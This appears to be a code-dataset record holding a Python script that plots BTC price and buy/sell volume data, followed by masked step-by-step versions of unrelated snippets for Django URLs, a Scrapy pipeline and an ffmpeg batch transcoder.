data = (date, open, high, low, close)
alist.append(data)
vols_bid.append(-vol_buy)
vols_ask.append(vol_sell)
diff_bid_2_ask.append(vol_buy-vol_sell)
diff_bid_2_ask_in_past_2_epochs.append(
vol_buy + row_previous1[7] - vol_sell-row_previous1[8])
diff_bid_2_ask_in_past_3_epochs.append(
vol_buy + row_previous1[7] +row_previous2[7] - vol_sell-row_previous1[8]-row_previous2[8])
avg_buy_diff_sell.append(avg_buy-avg_sell)
avg_amounts.append(avg_amount_per_trade*100)
dates.append(date)
# fig, ax = plt.subplots(figsize=(32, 18))
# fig.subplots_adjust(bottom=0.5)
# mpf.candlestick_ohlc(ax, alist, width=0.5, colorup='g', colordown='r', alpha=1.0)
# plt.grid(True)
# # 设置日期刻度旋转的角度
# plt.xticks(rotation=30)
# plt.title('wanda yuanxian 17')
# plt.xlabel('Date')
# plt.ylabel('Price')
# # x轴的刻度为日期
# ax.xaxis_date()
fig, axes = plt.subplots(3, sharex=True, figsize=(64, 30))
mpf.candlestick_ohlc(axes[0], alist, width=0.5, colorup='g', colordown='r')
axes[0].set_title('BTC')
axes[0].set_ylabel('价格')
axes[0].grid(True)
axes[0].xaxis_date()
# axes[1].plot(dates, avg_buy_diff_sell,c='red',linewidth=0.5)
# axes[1].plot(dates, avg_amounts,c='green', linewidth=0.5)
# axes[1].grid(True)
axes[1].plot(dates, avg_buy_diff_sell, c='orange')
axes[1].plot(dates, avg_amounts, c='blue')
axes[1].set_ylabel('成交量')
axes[1].grid(True)
axes[2].plot(dates, diff_bid_2_ask, c='green')
axes[2].plot(dates, diff_bid_2_ask_in_past_2_epochs, c='orange')
axes[2].plot(dates, diff_bid_2_ask_in_past_3_epochs, c='blue')
axes[2].set_ylabel('成交量')
axes[2].grid(True)
axes[2].set_ylabel('买卖均价')
axes[2].grid(True)
plt.show()
|
flexible
|
{
"blob_id": "9aaaa744780dbd32b14e09a34976a2a0a3ce34f7",
"index": 7864,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfor cnt in range(20, len(rows)):\n row_previous2 = rows[cnt - 2]\n row_previous1 = rows[cnt - 1]\n row = rows[cnt]\n open = row[2]\n high = row[3]\n low = row[4]\n close = row[5]\n vol = row[6]\n vol_buy, vol_sell = row[7:9]\n avg_buy, avg_sell, avg_amount_per_trade = row[-3:]\n date = date + 1\n data = date, open, high, low, close\n alist.append(data)\n vols_bid.append(-vol_buy)\n vols_ask.append(vol_sell)\n diff_bid_2_ask.append(vol_buy - vol_sell)\n diff_bid_2_ask_in_past_2_epochs.append(vol_buy + row_previous1[7] -\n vol_sell - row_previous1[8])\n diff_bid_2_ask_in_past_3_epochs.append(vol_buy + row_previous1[7] +\n row_previous2[7] - vol_sell - row_previous1[8] - row_previous2[8])\n avg_buy_diff_sell.append(avg_buy - avg_sell)\n avg_amounts.append(avg_amount_per_trade * 100)\n dates.append(date)\n<mask token>\nmpf.candlestick_ohlc(axes[0], alist, width=0.5, colorup='g', colordown='r')\naxes[0].set_title('BTC')\naxes[0].set_ylabel('价格')\naxes[0].grid(True)\naxes[0].xaxis_date()\naxes[1].plot(dates, avg_buy_diff_sell, c='orange')\naxes[1].plot(dates, avg_amounts, c='blue')\naxes[1].set_ylabel('成交量')\naxes[1].grid(True)\naxes[2].plot(dates, diff_bid_2_ask, c='green')\naxes[2].plot(dates, diff_bid_2_ask_in_past_2_epochs, c='orange')\naxes[2].plot(dates, diff_bid_2_ask_in_past_3_epochs, c='blue')\naxes[2].set_ylabel('成交量')\naxes[2].grid(True)\naxes[2].set_ylabel('买卖均价')\naxes[2].grid(True)\nplt.show()\n",
"step-3": "<mask token>\npgmanager = DB.PGManager(**CONSTANTS.DB_CONNECT_ARGS_LOCAL)\ntablename = 'klines_full_vol_50'\nrows = pgmanager.select('select * from ' + tablename +\n ' where timestamp>1577808000+86400*5 order by timestamp limit 300')\na = 1\nalist = []\nvols_bid = []\nvols_ask = []\ndiff_bid_2_ask = []\ndiff_bid_2_ask_in_past_2_epochs = []\ndiff_bid_2_ask_in_past_3_epochs = []\ndiff_bid_2_ask_in_past_5_epochs = []\ndiff_bid_2_ask_in_past_10_epochs = []\ndiff_bid_2_ask_in_past_20_epochs = []\navg_buys = []\navg_sells = []\navg_buy_diff_sell = []\navg_amounts = []\ndates = []\ncnt = 0\ndate = date2num(datetime.datetime.fromtimestamp(rows[0][1]))\nfor cnt in range(20, len(rows)):\n row_previous2 = rows[cnt - 2]\n row_previous1 = rows[cnt - 1]\n row = rows[cnt]\n open = row[2]\n high = row[3]\n low = row[4]\n close = row[5]\n vol = row[6]\n vol_buy, vol_sell = row[7:9]\n avg_buy, avg_sell, avg_amount_per_trade = row[-3:]\n date = date + 1\n data = date, open, high, low, close\n alist.append(data)\n vols_bid.append(-vol_buy)\n vols_ask.append(vol_sell)\n diff_bid_2_ask.append(vol_buy - vol_sell)\n diff_bid_2_ask_in_past_2_epochs.append(vol_buy + row_previous1[7] -\n vol_sell - row_previous1[8])\n diff_bid_2_ask_in_past_3_epochs.append(vol_buy + row_previous1[7] +\n row_previous2[7] - vol_sell - row_previous1[8] - row_previous2[8])\n avg_buy_diff_sell.append(avg_buy - avg_sell)\n avg_amounts.append(avg_amount_per_trade * 100)\n dates.append(date)\nfig, axes = plt.subplots(3, sharex=True, figsize=(64, 30))\nmpf.candlestick_ohlc(axes[0], alist, width=0.5, colorup='g', colordown='r')\naxes[0].set_title('BTC')\naxes[0].set_ylabel('价格')\naxes[0].grid(True)\naxes[0].xaxis_date()\naxes[1].plot(dates, avg_buy_diff_sell, c='orange')\naxes[1].plot(dates, avg_amounts, c='blue')\naxes[1].set_ylabel('成交量')\naxes[1].grid(True)\naxes[2].plot(dates, diff_bid_2_ask, c='green')\naxes[2].plot(dates, diff_bid_2_ask_in_past_2_epochs, c='orange')\naxes[2].plot(dates, diff_bid_2_ask_in_past_3_epochs, c='blue')\naxes[2].set_ylabel('成交量')\naxes[2].grid(True)\naxes[2].set_ylabel('买卖均价')\naxes[2].grid(True)\nplt.show()\n",
"step-4": "from packages import data as DATA\nfrom packages import plot as PLOT\nfrom packages import universal as UNIVERSAL\nfrom packages import currency_pair as CP\nimport matplotlib.pyplot as plt\nimport mpl_finance as mpf\nfrom packages import db as DB\nimport CONSTANTS\nimport datetime\nfrom matplotlib.pylab import date2num\nfrom matplotlib.widgets import Cursor\npgmanager = DB.PGManager(**CONSTANTS.DB_CONNECT_ARGS_LOCAL)\ntablename = 'klines_full_vol_50'\nrows = pgmanager.select('select * from ' + tablename +\n ' where timestamp>1577808000+86400*5 order by timestamp limit 300')\na = 1\nalist = []\nvols_bid = []\nvols_ask = []\ndiff_bid_2_ask = []\ndiff_bid_2_ask_in_past_2_epochs = []\ndiff_bid_2_ask_in_past_3_epochs = []\ndiff_bid_2_ask_in_past_5_epochs = []\ndiff_bid_2_ask_in_past_10_epochs = []\ndiff_bid_2_ask_in_past_20_epochs = []\navg_buys = []\navg_sells = []\navg_buy_diff_sell = []\navg_amounts = []\ndates = []\ncnt = 0\ndate = date2num(datetime.datetime.fromtimestamp(rows[0][1]))\nfor cnt in range(20, len(rows)):\n row_previous2 = rows[cnt - 2]\n row_previous1 = rows[cnt - 1]\n row = rows[cnt]\n open = row[2]\n high = row[3]\n low = row[4]\n close = row[5]\n vol = row[6]\n vol_buy, vol_sell = row[7:9]\n avg_buy, avg_sell, avg_amount_per_trade = row[-3:]\n date = date + 1\n data = date, open, high, low, close\n alist.append(data)\n vols_bid.append(-vol_buy)\n vols_ask.append(vol_sell)\n diff_bid_2_ask.append(vol_buy - vol_sell)\n diff_bid_2_ask_in_past_2_epochs.append(vol_buy + row_previous1[7] -\n vol_sell - row_previous1[8])\n diff_bid_2_ask_in_past_3_epochs.append(vol_buy + row_previous1[7] +\n row_previous2[7] - vol_sell - row_previous1[8] - row_previous2[8])\n avg_buy_diff_sell.append(avg_buy - avg_sell)\n avg_amounts.append(avg_amount_per_trade * 100)\n dates.append(date)\nfig, axes = plt.subplots(3, sharex=True, figsize=(64, 30))\nmpf.candlestick_ohlc(axes[0], alist, width=0.5, colorup='g', colordown='r')\naxes[0].set_title('BTC')\naxes[0].set_ylabel('价格')\naxes[0].grid(True)\naxes[0].xaxis_date()\naxes[1].plot(dates, avg_buy_diff_sell, c='orange')\naxes[1].plot(dates, avg_amounts, c='blue')\naxes[1].set_ylabel('成交量')\naxes[1].grid(True)\naxes[2].plot(dates, diff_bid_2_ask, c='green')\naxes[2].plot(dates, diff_bid_2_ask_in_past_2_epochs, c='orange')\naxes[2].plot(dates, diff_bid_2_ask_in_past_3_epochs, c='blue')\naxes[2].set_ylabel('成交量')\naxes[2].grid(True)\naxes[2].set_ylabel('买卖均价')\naxes[2].grid(True)\nplt.show()\n",
"step-5": "from packages import data as DATA\nfrom packages import plot as PLOT\nfrom packages import universal as UNIVERSAL\nfrom packages import currency_pair as CP\nimport matplotlib.pyplot as plt\nimport mpl_finance as mpf\nfrom packages import db as DB\nimport CONSTANTS\nimport datetime\nfrom matplotlib.pylab import date2num\nfrom matplotlib.widgets import Cursor\n\npgmanager=DB.PGManager(**CONSTANTS.DB_CONNECT_ARGS_LOCAL)\ntablename='klines_full_vol_50'\n\nrows=pgmanager.select('select * from '+tablename + ' where timestamp>1577808000+86400*5 order by timestamp limit 300')\na=1\n\nalist = []\nvols_bid = []\nvols_ask = []\ndiff_bid_2_ask = []\ndiff_bid_2_ask_in_past_2_epochs = []\ndiff_bid_2_ask_in_past_3_epochs = []\ndiff_bid_2_ask_in_past_5_epochs = []\ndiff_bid_2_ask_in_past_10_epochs = []\ndiff_bid_2_ask_in_past_20_epochs = []\navg_buys=[]\navg_sells=[]\navg_buy_diff_sell=[]\navg_amounts=[]\ndates = []\ncnt = 0\ndate = date2num(datetime.datetime.fromtimestamp(rows[0][1]))\n\nfor cnt in range(20, len(rows)):\n row_previous2=rows[cnt-2]\n row_previous1 = rows[cnt - 1]\n row = rows[cnt]\n open=row[2]\n high=row[3]\n low=row[4]\n close=row[5]\n vol=row[6]\n vol_buy,vol_sell=row[7:9]\n avg_buy, avg_sell, avg_amount_per_trade=row[-3:]\n date = date + 1\n data = (date, open, high, low, close)\n alist.append(data)\n vols_bid.append(-vol_buy)\n vols_ask.append(vol_sell)\n diff_bid_2_ask.append(vol_buy-vol_sell)\n diff_bid_2_ask_in_past_2_epochs.append(\n vol_buy + row_previous1[7] - vol_sell-row_previous1[8])\n diff_bid_2_ask_in_past_3_epochs.append(\n vol_buy + row_previous1[7] +row_previous2[7] - vol_sell-row_previous1[8]-row_previous2[8])\n avg_buy_diff_sell.append(avg_buy-avg_sell)\n avg_amounts.append(avg_amount_per_trade*100)\n dates.append(date)\n\n# fig, ax = plt.subplots(figsize=(32, 18))\n# fig.subplots_adjust(bottom=0.5)\n# mpf.candlestick_ohlc(ax, alist, width=0.5, colorup='g', colordown='r', alpha=1.0)\n# plt.grid(True)\n# # 设置日期刻度旋转的角度\n# plt.xticks(rotation=30)\n# plt.title('wanda yuanxian 17')\n# plt.xlabel('Date')\n# plt.ylabel('Price')\n# # x轴的刻度为日期\n# ax.xaxis_date()\n\nfig, axes = plt.subplots(3, sharex=True, figsize=(64, 30))\nmpf.candlestick_ohlc(axes[0], alist, width=0.5, colorup='g', colordown='r')\n\naxes[0].set_title('BTC')\naxes[0].set_ylabel('价格')\naxes[0].grid(True)\naxes[0].xaxis_date()\n\n# axes[1].plot(dates, avg_buy_diff_sell,c='red',linewidth=0.5)\n# axes[1].plot(dates, avg_amounts,c='green', linewidth=0.5)\n# axes[1].grid(True)\naxes[1].plot(dates, avg_buy_diff_sell, c='orange')\naxes[1].plot(dates, avg_amounts, c='blue')\naxes[1].set_ylabel('成交量')\naxes[1].grid(True)\n\naxes[2].plot(dates, diff_bid_2_ask, c='green')\naxes[2].plot(dates, diff_bid_2_ask_in_past_2_epochs, c='orange')\naxes[2].plot(dates, diff_bid_2_ask_in_past_3_epochs, c='blue')\naxes[2].set_ylabel('成交量')\naxes[2].grid(True)\n\naxes[2].set_ylabel('买卖均价')\naxes[2].grid(True)\n\nplt.show()",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
from django.contrib import admin
from django.urls import path, include
from serverside.router import router
from rest_framework.authtoken import views as auth_views
from . import views
from .views import CustomObtainAuthToken
urlpatterns = [path('users/', views.UserCreateAPIView.as_view(), name=
'user-list'), path('users/login/', CustomObtainAuthToken.as_view()),
path('users/<int:pk>/', views.ReadUserAPIView.as_view()), path(
'users/<int:pk>/profile/', views.ReadUpdateProfileAPIView.as_view()),
path('charities/', views.ListCharitiesAPIView.as_view()), path(
'categories/', views.ListCategoriesAPIView.as_view())]
|
normal
|
{
"blob_id": "49d76458b8adcf6eea9db2ef127609ff96e03ad1",
"index": 6270,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nurlpatterns = [path('users/', views.UserCreateAPIView.as_view(), name=\n 'user-list'), path('users/login/', CustomObtainAuthToken.as_view()),\n path('users/<int:pk>/', views.ReadUserAPIView.as_view()), path(\n 'users/<int:pk>/profile/', views.ReadUpdateProfileAPIView.as_view()),\n path('charities/', views.ListCharitiesAPIView.as_view()), path(\n 'categories/', views.ListCategoriesAPIView.as_view())]\n",
"step-3": "from django.contrib import admin\nfrom django.urls import path, include\nfrom serverside.router import router\nfrom rest_framework.authtoken import views as auth_views\nfrom . import views\nfrom .views import CustomObtainAuthToken\nurlpatterns = [path('users/', views.UserCreateAPIView.as_view(), name=\n 'user-list'), path('users/login/', CustomObtainAuthToken.as_view()),\n path('users/<int:pk>/', views.ReadUserAPIView.as_view()), path(\n 'users/<int:pk>/profile/', views.ReadUpdateProfileAPIView.as_view()),\n path('charities/', views.ListCharitiesAPIView.as_view()), path(\n 'categories/', views.ListCategoriesAPIView.as_view())]\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
# -*- coding: utf-8 -*-
# Define your item pipelines here
#
# Don't forget to add your pipeline to the ITEM_PIPELINES setting
# See: http://doc.scrapy.org/en/latest/topics/item-pipeline.html
import codecs
import time
import json
import os
class OitYitikuscrapyDataPipeline(object):
def open_spider(self, spider):
path ='D:\\xiti10001\\data\\{}\\'.format(time.strftime("%Y%m%d",time.localtime()))
# path = 'd:\\OITData\\zujuan\\{0}\\{1}\\'.format(time.strftime("%Y%m%d", time.localtime()), spider.name)
isExists = os.path.exists(path)
if isExists:
pass
else:
os.makedirs(path)
self.file = codecs.open(path + spider.name+'.json', 'a', encoding='utf-8')
def process_item(self, item, spider):
print('进程打印信息:',spider.name)
lines = json.dumps(dict(item), ensure_ascii=False) + '\n'
self.file.write(lines)
return item
def close_spider(self, spider):
self.file.close()
|
normal
|
{
"blob_id": "315996a783d7b95fd87374a8fe2602a572de071e",
"index": 3495,
"step-1": "<mask token>\n\n\nclass OitYitikuscrapyDataPipeline(object):\n\n def open_spider(self, spider):\n path = 'D:\\\\xiti10001\\\\data\\\\{}\\\\'.format(time.strftime('%Y%m%d',\n time.localtime()))\n isExists = os.path.exists(path)\n if isExists:\n pass\n else:\n os.makedirs(path)\n self.file = codecs.open(path + spider.name + '.json', 'a', encoding\n ='utf-8')\n <mask token>\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass OitYitikuscrapyDataPipeline(object):\n\n def open_spider(self, spider):\n path = 'D:\\\\xiti10001\\\\data\\\\{}\\\\'.format(time.strftime('%Y%m%d',\n time.localtime()))\n isExists = os.path.exists(path)\n if isExists:\n pass\n else:\n os.makedirs(path)\n self.file = codecs.open(path + spider.name + '.json', 'a', encoding\n ='utf-8')\n\n def process_item(self, item, spider):\n print('进程打印信息:', spider.name)\n lines = json.dumps(dict(item), ensure_ascii=False) + '\\n'\n self.file.write(lines)\n return item\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass OitYitikuscrapyDataPipeline(object):\n\n def open_spider(self, spider):\n path = 'D:\\\\xiti10001\\\\data\\\\{}\\\\'.format(time.strftime('%Y%m%d',\n time.localtime()))\n isExists = os.path.exists(path)\n if isExists:\n pass\n else:\n os.makedirs(path)\n self.file = codecs.open(path + spider.name + '.json', 'a', encoding\n ='utf-8')\n\n def process_item(self, item, spider):\n print('进程打印信息:', spider.name)\n lines = json.dumps(dict(item), ensure_ascii=False) + '\\n'\n self.file.write(lines)\n return item\n\n def close_spider(self, spider):\n self.file.close()\n",
"step-4": "import codecs\nimport time\nimport json\nimport os\n\n\nclass OitYitikuscrapyDataPipeline(object):\n\n def open_spider(self, spider):\n path = 'D:\\\\xiti10001\\\\data\\\\{}\\\\'.format(time.strftime('%Y%m%d',\n time.localtime()))\n isExists = os.path.exists(path)\n if isExists:\n pass\n else:\n os.makedirs(path)\n self.file = codecs.open(path + spider.name + '.json', 'a', encoding\n ='utf-8')\n\n def process_item(self, item, spider):\n print('进程打印信息:', spider.name)\n lines = json.dumps(dict(item), ensure_ascii=False) + '\\n'\n self.file.write(lines)\n return item\n\n def close_spider(self, spider):\n self.file.close()\n",
"step-5": "# -*- coding: utf-8 -*-\n\n# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: http://doc.scrapy.org/en/latest/topics/item-pipeline.html\nimport codecs\nimport time\nimport json\nimport os\n\nclass OitYitikuscrapyDataPipeline(object):\n def open_spider(self, spider):\n path ='D:\\\\xiti10001\\\\data\\\\{}\\\\'.format(time.strftime(\"%Y%m%d\",time.localtime()))\n # path = 'd:\\\\OITData\\\\zujuan\\\\{0}\\\\{1}\\\\'.format(time.strftime(\"%Y%m%d\", time.localtime()), spider.name)\n isExists = os.path.exists(path)\n if isExists:\n pass\n else:\n os.makedirs(path)\n self.file = codecs.open(path + spider.name+'.json', 'a', encoding='utf-8')\n def process_item(self, item, spider):\n print('进程打印信息:',spider.name)\n lines = json.dumps(dict(item), ensure_ascii=False) + '\\n'\n self.file.write(lines)\n return item\n\n def close_spider(self, spider):\n self.file.close()\n",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
<|reserved_special_token_0|>
def chk_tmp_file(f_tmp):
pass
def get_file_base(path):
fname = os.path.basename(path)
return fname.split('.ts')[0]
def _exec_transcode(path):
f_base = get_file_base(path)
work_base = get_work_base(f_base)
f_in = os.path.join(dir_ts_files, f_base + '.ts')
f_tmp = os.path.join(dir_output, work_base + '_tmp.m4v')
f_out = os.path.join(dir_output, f_base + '.m4v')
opt = (
'-i "%(f_in)s" -vf scale=720:-1,yadif=0:-1:1 -c:v libx264 -preset faster -crf 27 -c:a aac -b:a 96k -filter_complex channelsplit "%(f_tmp)s"'
)
enc_args = opt % vars()
if os.path.exists(f_tmp):
os.remove(f_tmp)
cmd = path_ffmpeg + ' ' + enc_args
print(cmd)
res = subprocess.run(cmd, stdout=subprocess.PIPE, shell=True)
if res and res.returncode == 0:
print('Well done. encoding .....')
print('rename')
os.rename(f_tmp, f_out)
else:
print('failed ..... remove tmp-file')
os.remove(f_tmp)
return
def del_files():
pass
def itr_ts_files():
for path in os.listdir(dir_ts_files):
if path.endswith('.ts'):
yield path
def transcode():
try:
with open(path_lock, 'x') as fl:
for path in itr_ts_files():
print('\nStart transcode [%s]' % path)
_exec_transcode(path)
os.remove(path_lock)
print('Finish transcode [%s]' % path)
except FileExistsError as e:
print(e)
return
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def get_work_base(f_base):
re_num = re.compile('(\\d+)\\-.+')
r = re_num.search(f_base)
res = ''
if r:
print(r.group(1))
res = r.group(1)
else:
print('error... cant find f_base.')
return res
def chk_tmp_file(f_tmp):
pass
def get_file_base(path):
fname = os.path.basename(path)
return fname.split('.ts')[0]
def _exec_transcode(path):
f_base = get_file_base(path)
work_base = get_work_base(f_base)
f_in = os.path.join(dir_ts_files, f_base + '.ts')
f_tmp = os.path.join(dir_output, work_base + '_tmp.m4v')
f_out = os.path.join(dir_output, f_base + '.m4v')
opt = (
'-i "%(f_in)s" -vf scale=720:-1,yadif=0:-1:1 -c:v libx264 -preset faster -crf 27 -c:a aac -b:a 96k -filter_complex channelsplit "%(f_tmp)s"'
)
enc_args = opt % vars()
if os.path.exists(f_tmp):
os.remove(f_tmp)
cmd = path_ffmpeg + ' ' + enc_args
print(cmd)
res = subprocess.run(cmd, stdout=subprocess.PIPE, shell=True)
if res and res.returncode == 0:
print('Well done. encoding .....')
print('rename')
os.rename(f_tmp, f_out)
else:
print('failed ..... remove tmp-file')
os.remove(f_tmp)
return
def del_files():
pass
def itr_ts_files():
for path in os.listdir(dir_ts_files):
if path.endswith('.ts'):
yield path
def transcode():
try:
with open(path_lock, 'x') as fl:
for path in itr_ts_files():
print('\nStart transcode [%s]' % path)
_exec_transcode(path)
os.remove(path_lock)
print('Finish transcode [%s]' % path)
except FileExistsError as e:
print(e)
return
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def get_work_base(f_base):
re_num = re.compile('(\\d+)\\-.+')
r = re_num.search(f_base)
res = ''
if r:
print(r.group(1))
res = r.group(1)
else:
print('error... cant find f_base.')
return res
def chk_tmp_file(f_tmp):
pass
def get_file_base(path):
fname = os.path.basename(path)
return fname.split('.ts')[0]
def _exec_transcode(path):
f_base = get_file_base(path)
work_base = get_work_base(f_base)
f_in = os.path.join(dir_ts_files, f_base + '.ts')
f_tmp = os.path.join(dir_output, work_base + '_tmp.m4v')
f_out = os.path.join(dir_output, f_base + '.m4v')
opt = (
'-i "%(f_in)s" -vf scale=720:-1,yadif=0:-1:1 -c:v libx264 -preset faster -crf 27 -c:a aac -b:a 96k -filter_complex channelsplit "%(f_tmp)s"'
)
enc_args = opt % vars()
if os.path.exists(f_tmp):
os.remove(f_tmp)
cmd = path_ffmpeg + ' ' + enc_args
print(cmd)
res = subprocess.run(cmd, stdout=subprocess.PIPE, shell=True)
if res and res.returncode == 0:
print('Well done. encoding .....')
print('rename')
os.rename(f_tmp, f_out)
else:
print('failed ..... remove tmp-file')
os.remove(f_tmp)
return
def del_files():
pass
def itr_ts_files():
for path in os.listdir(dir_ts_files):
if path.endswith('.ts'):
yield path
def transcode():
try:
with open(path_lock, 'x') as fl:
for path in itr_ts_files():
print('\nStart transcode [%s]' % path)
_exec_transcode(path)
os.remove(path_lock)
print('Finish transcode [%s]' % path)
except FileExistsError as e:
print(e)
return
if __name__ == '__main__':
transcode()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
path_ffmpeg = 'C:\\work\\ffmpeg\\ffmpeg-3.4.2-win64-static\\bin\\ffmpeg.exe'
dir_ts_files = 'E:\\ts'
dir_output = 'E:\\hb'
path_lock = 'C:\\work\\ffmpeg\\encode.lock'
def get_work_base(f_base):
re_num = re.compile('(\\d+)\\-.+')
r = re_num.search(f_base)
res = ''
if r:
print(r.group(1))
res = r.group(1)
else:
print('error... cant find f_base.')
return res
def chk_tmp_file(f_tmp):
pass
def get_file_base(path):
fname = os.path.basename(path)
return fname.split('.ts')[0]
def _exec_transcode(path):
f_base = get_file_base(path)
work_base = get_work_base(f_base)
f_in = os.path.join(dir_ts_files, f_base + '.ts')
f_tmp = os.path.join(dir_output, work_base + '_tmp.m4v')
f_out = os.path.join(dir_output, f_base + '.m4v')
opt = (
'-i "%(f_in)s" -vf scale=720:-1,yadif=0:-1:1 -c:v libx264 -preset faster -crf 27 -c:a aac -b:a 96k -filter_complex channelsplit "%(f_tmp)s"'
)
enc_args = opt % vars()
if os.path.exists(f_tmp):
os.remove(f_tmp)
cmd = path_ffmpeg + ' ' + enc_args
print(cmd)
res = subprocess.run(cmd, stdout=subprocess.PIPE, shell=True)
if res and res.returncode == 0:
print('Well done. encoding .....')
print('rename')
os.rename(f_tmp, f_out)
else:
print('failed ..... remove tmp-file')
os.remove(f_tmp)
return
def del_files():
pass
def itr_ts_files():
for path in os.listdir(dir_ts_files):
if path.endswith('.ts'):
yield path
def transcode():
try:
with open(path_lock, 'x') as fl:
for path in itr_ts_files():
print('\nStart transcode [%s]' % path)
_exec_transcode(path)
os.remove(path_lock)
print('Finish transcode [%s]' % path)
except FileExistsError as e:
print(e)
return
if __name__ == '__main__':
transcode()
<|reserved_special_token_1|>
import os
import subprocess
import re
# import fcntl
# path_ffmpeg =
path_ffmpeg = r'C:\work\ffmpeg\ffmpeg-3.4.2-win64-static\bin\ffmpeg.exe'
dir_ts_files = r'E:\ts'
dir_output = r'E:\hb'
path_lock = r'C:\work\ffmpeg\encode.lock'
def get_work_base(f_base):
re_num = re.compile(r'(\d+)\-.+')
r = re_num.search(f_base)
res = ''
if r:
print(r.group(1))
res = r.group(1)
else:
print('error... cant find f_base.')
return res
def chk_tmp_file(f_tmp):
pass
def get_file_base(path):
fname = os.path.basename(path)
return fname.split('.ts')[0]
def _exec_transcode(path):
f_base = get_file_base(path)
work_base = get_work_base(f_base)
f_in = os.path.join(dir_ts_files, f_base + '.ts')
f_tmp = os.path.join(dir_output, work_base + '_tmp.m4v')
f_out = os.path.join(dir_output, f_base + '.m4v')
#opt = '-i %(f_in)s -vf scale=720:-1 -c:v libx264 -preset faster -crf 27 -c:a aac -b:a 96k -filter_complex channelsplit %(f_tmp)s'
#opt = '-i %(f_in)s -vf scale=720:-1,yadif=0:-1:1 -c:v libx264 -preset faster -crf 27 -g 1 -c:a aac -b:a 96k -filter_complex channelsplit %(f_tmp)s'
opt = '-i "%(f_in)s" -vf scale=720:-1,yadif=0:-1:1 -c:v libx264 -preset faster -crf 27 -c:a aac -b:a 96k -filter_complex channelsplit "%(f_tmp)s"'
#opt = '-i %(f_in)s -vf scale=840:-1,yadif=0:-1:1 -c:v libx264 -preset faster -crf 26 -c:a aac -b:a 96k -filter_complex channelsplit %(f_tmp)s'
enc_args = opt % vars()
if os.path.exists(f_tmp):
os.remove(f_tmp)
# cmd = ' '.join([ffmpeg, f_in, f_out])
cmd = path_ffmpeg + ' ' + enc_args
print(cmd)
# res = subprocess.run([ffmpeg, enc_args], stdout=subprocess.PIPE)
res = subprocess.run(cmd, stdout=subprocess.PIPE, shell=True)
#return res
if res and res.returncode == 0:
print('Well done. encoding .....')
print('rename')
os.rename(f_tmp, f_out)
else:
print('failed ..... remove tmp-file')
os.remove(f_tmp)
return
def del_files():
pass
def itr_ts_files():
# [print(path) for path in os.listdir(dir_ts) if path.endswith('.ts')]
for path in os.listdir(dir_ts_files):
if path.endswith('.ts'):
yield path
def transcode():
# 複数プロセス起動を防ぐためファイルロックを利用。x-modeでopen (for Windows)
#os.remove(path_lock)
#return
try:
with open(path_lock, 'x') as fl:
for path in itr_ts_files():
print('\nStart transcode [%s]' % path)
_exec_transcode(path)
os.remove(path_lock)
print('Finish transcode [%s]' % path)
except FileExistsError as e:
# print('ロックを獲得できませんでした... エンコード中')
print(e)
return
# TODO
# tmp-file をロック。できなければ終了。
# f_out があれば、終了。
# f_in を削除 (正常終了の場合)
# ts ファイルのステータスチェック(録画済か録画中か?)
# ts ファイルをみつけて、エンコード開始
if __name__ == '__main__':
transcode()
|
flexible
|
{
"blob_id": "502e2d2222863236a42512ffc98c2cc9deaf454f",
"index": 7058,
"step-1": "<mask token>\n\n\ndef chk_tmp_file(f_tmp):\n pass\n\n\ndef get_file_base(path):\n fname = os.path.basename(path)\n return fname.split('.ts')[0]\n\n\ndef _exec_transcode(path):\n f_base = get_file_base(path)\n work_base = get_work_base(f_base)\n f_in = os.path.join(dir_ts_files, f_base + '.ts')\n f_tmp = os.path.join(dir_output, work_base + '_tmp.m4v')\n f_out = os.path.join(dir_output, f_base + '.m4v')\n opt = (\n '-i \"%(f_in)s\" -vf scale=720:-1,yadif=0:-1:1 -c:v libx264 -preset faster -crf 27 -c:a aac -b:a 96k -filter_complex channelsplit \"%(f_tmp)s\"'\n )\n enc_args = opt % vars()\n if os.path.exists(f_tmp):\n os.remove(f_tmp)\n cmd = path_ffmpeg + ' ' + enc_args\n print(cmd)\n res = subprocess.run(cmd, stdout=subprocess.PIPE, shell=True)\n if res and res.returncode == 0:\n print('Well done. encoding .....')\n print('rename')\n os.rename(f_tmp, f_out)\n else:\n print('failed ..... remove tmp-file')\n os.remove(f_tmp)\n return\n\n\ndef del_files():\n pass\n\n\ndef itr_ts_files():\n for path in os.listdir(dir_ts_files):\n if path.endswith('.ts'):\n yield path\n\n\ndef transcode():\n try:\n with open(path_lock, 'x') as fl:\n for path in itr_ts_files():\n print('\\nStart transcode [%s]' % path)\n _exec_transcode(path)\n os.remove(path_lock)\n print('Finish transcode [%s]' % path)\n except FileExistsError as e:\n print(e)\n return\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef get_work_base(f_base):\n re_num = re.compile('(\\\\d+)\\\\-.+')\n r = re_num.search(f_base)\n res = ''\n if r:\n print(r.group(1))\n res = r.group(1)\n else:\n print('error... cant find f_base.')\n return res\n\n\ndef chk_tmp_file(f_tmp):\n pass\n\n\ndef get_file_base(path):\n fname = os.path.basename(path)\n return fname.split('.ts')[0]\n\n\ndef _exec_transcode(path):\n f_base = get_file_base(path)\n work_base = get_work_base(f_base)\n f_in = os.path.join(dir_ts_files, f_base + '.ts')\n f_tmp = os.path.join(dir_output, work_base + '_tmp.m4v')\n f_out = os.path.join(dir_output, f_base + '.m4v')\n opt = (\n '-i \"%(f_in)s\" -vf scale=720:-1,yadif=0:-1:1 -c:v libx264 -preset faster -crf 27 -c:a aac -b:a 96k -filter_complex channelsplit \"%(f_tmp)s\"'\n )\n enc_args = opt % vars()\n if os.path.exists(f_tmp):\n os.remove(f_tmp)\n cmd = path_ffmpeg + ' ' + enc_args\n print(cmd)\n res = subprocess.run(cmd, stdout=subprocess.PIPE, shell=True)\n if res and res.returncode == 0:\n print('Well done. encoding .....')\n print('rename')\n 